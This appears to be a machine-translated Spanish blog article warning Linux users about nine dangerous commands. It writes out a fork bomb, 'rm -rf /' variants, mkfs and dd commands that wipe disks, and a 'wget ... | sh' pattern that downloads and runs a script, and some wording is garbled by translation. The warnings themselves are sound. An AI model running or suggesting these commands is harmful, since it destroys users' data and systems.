9 Comandos y códigos de Linux para tener cuidado con
Los comandos de shell / terminal de Linux son muy potentes y un simple comando podría llevar a que se elimine una carpeta, archivos o carpeta raíz, etc.
En algunos casos, Linux ni siquiera le pedirá confirmación, sino que ejecutará el comando de inmediato, lo que le hará perder información y datos valiosos almacenados en estos archivos y carpetas.
Es común que las personas publiquen contenido en la web recomendando nuevos usuarios de Linux para ejecutar estos comandos . Esto puede parecer una broma para alguien que ha publicado el contenido, pero no es risa para la persona del otro lado.
Hemos reunido algunos comandos de Linux que son bastante dañinos para su sistema y que lo ayudarán a evitarlos. Tenga en cuenta que, de hecho, son peligrosos e incluso pueden modificarse de diversas maneras para producir nuevos comandos que infligen más daño.
Una cosa importante a tener en cuenta es que algunos de estos comandos solo son peligrosos si están prefijados con sudo en Ubuntu . Mientras que en otras distribuciones de Linux, la mayoría de estos comandos dados serán peligrosos de ejecutar como raíz.
Eche un vistazo a los 9 comandos y códigos que debe evitar ejecutar.
1. Comando Linux Fork Fork
:(){ :|: & };:
también conocido como Fork Bomb es un ataque de denegación de servicio contra un sistema Linux. :(){ :|: & };:
es una función bash. Una vez ejecutado, se repite varias veces hasta que el sistema se congela .
Solo puede deshacerse de él reiniciando su sistema. Así que tenga cuidado al ejecutar este comando en su shell de Linux.
2. carpeta mv / dev / null Command
mv folder/dev/null
es otro comando arriesgado. Dev/null
o null device
es un archivo de dispositivo que descarta todos los datos escritos pero informa que la operación de escritura se ejecuta con éxito . También se lo conoce como bit bucked o black hole .
3. comando rm -rf
rm -rf
comando rm -rf
es una forma rápida de eliminar una carpeta y su contenido en el sistema operativo Linux. Si no sabe cómo usarlo correctamente, puede volverse muy peligroso para el sistema. Las combinaciones y opciones más comunes utilizadas con el comando rm-rf se enumeran a continuación:
rm
comandorm
se usa para eliminar los archivos en el sistema Linux.rm -f
comandorm -f
elimina los archivos de solo lectura en la carpeta sin preguntar.rm -r
comando elimina el contenido de una carpeta recursivamente.rm -d
comandorm -d
se usa para eliminar un directorio vacío pero rechazará eliminar el directorio si no está vacío.rm -rf/
command se usa para eliminación forzada (lo elimina incluso si está protegido contra escritura) de todo el contenido en el directorio raíz y las subcarpetas.rm -rf*
comandorm -rf*
se usa para borrar forzosamente todo el contenido del directorio actual (el directorio en el que está trabajando actualmente) y las subcarpetas.rm -rf.
comando se utiliza para la eliminación forzada de todo el contenido en la carpeta actual y las subcarpetas. Elrm -r.[^.]*
También se puede usar.rm -i
comandorm -i
se usa para eliminar archivos y carpetas, pero aparecerá un mensaje antes de eliminarlo.
4. comando de mkfs
mkfs
puede ser un comando peligroso para su sistema basado en Linux si no conoce su propósito. Cualquier cosa escrita después de los mkfs será formateada y reemplazada por un sistema de archivos Linux vacío .
Todos los comandos mencionados a continuación formatearán el disco duro y requieren derechos de administrador:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
El comando mkfs.cramfs
hará lo mismo que el anterior pero no requiere derechos de administrador para ejecutarse.
5. Bomba Tar
El comando tar
se usa para combinar múltiples archivos en un solo archivo (archivo archivado) en formato .tar . Se puede crear una bomba Tape Archive (Tar) con este comando.
Es un archivo de almacenamiento que explota en miles o millones de archivos con nombres similares a los archivos existentes en el directorio actual en lugar de hacerlo en un nuevo directorio cuando se desmarca.
Puede evitar convertirse en víctima de una bomba de alquitrán creando regularmente un nuevo directorio de protección cada vez que reciba un archivo tar y luego mueva el archivo tar recibido a este directorio antes de anular la marcación.
Si el archivo tar es de hecho una bomba alquitranada, simplemente puedes eliminar el directorio recién creado para deshacerte de él. Otra forma de evitar la explosión de una bomba de alquitrán es a través de la opción -t
para listar todo el contenido de un archivo tar para darle una idea del tipo de contenido contenido en el archivo tar.
6. dd comando
El comando dd
se usa para copiar y convertir particiones de disco duro . Sin embargo, puede resultar perjudicial si especifica un destino incorrecto.
El comando puede ser cualquiera de estos:
dd if=/dev/hda of=/dev/hdb
dd if=/dev/hda of=/dev/sdb
dd if=something of=/dev/hda
dd if=something of=/dev/sda
El siguiente comando pondrá a cero todo el disco duro primario: dd if=/dev/zero of=/dev/had
7. Código de script de shell
Alguien puede victimizarlo dándole el enlace a un guión de shell y endosando que lo descargue y lo ejecute . La secuencia de comandos puede contener algún código malicioso o peligroso dentro. El formato del comando puede verse así: wget http://some_malicious_source -O- | sh
wget http://some_malicious_source -O- | sh
. El wget
descargará el script mientras sh descarga la ejecución del script.
8. Código fuente malicioso
Alguien te da el código fuente y te pide que compiles. El código puede parecer un código normal, pero de hecho, algunos códigos maliciosos se ocultan en el código fuente grande y pueden dañar el sistema. Para evitar ser víctima de este tipo de ataque, solo acepte y compile su código fuente de fuentes confiables .
9. Bomba de descompresión
Ha recibido un archivo comprimido y se le pide que extraiga este archivo, que parece ser de un tamaño muy pequeño, pero puede tener algunos KB. De hecho, este archivo comprimido de pequeño tamaño contiene datos muy comprimidos .
Una vez que el archivo se descomprime, se extraen cientos de GB de datos que pueden llenar su disco duro para reducir el rendimiento de su sistema. Para evitar esta situación, recuerde siempre aceptar datos de fuentes confiables.
Cómo superponer CSS-Only Efecto con Box-Shadow
Las superposiciones de contenido son una parte prominente del diseño web moderno. Le ayudan a ocultar un elemento en una página web y luego, con la aprobación del usuario, lo revelan y muestran información o controles adicionales, como botones detrás de él.Una superposición típica es semitransparente, con un color de fondo sólido (generalmente negro), y hay texto o botones para que los usuarios vean o interactúen. Después
Reemplaza atentamente los anuncios tradicionales con bellos gráficos
Los bloqueadores de anuncios son algunas de las herramientas más útiles disponibles que ayudan a filtrar anuncios de aplicaciones, juegos o navegadores que pueden molestar y distraer a los usuarios . Sin embargo, en el proceso de filtrar esos anuncios, estos bloqueadores de anuncios tienden a dejar un sitio con más espacio en blanco, lo que puede hacer que el sitio web parezca más vacío .Si t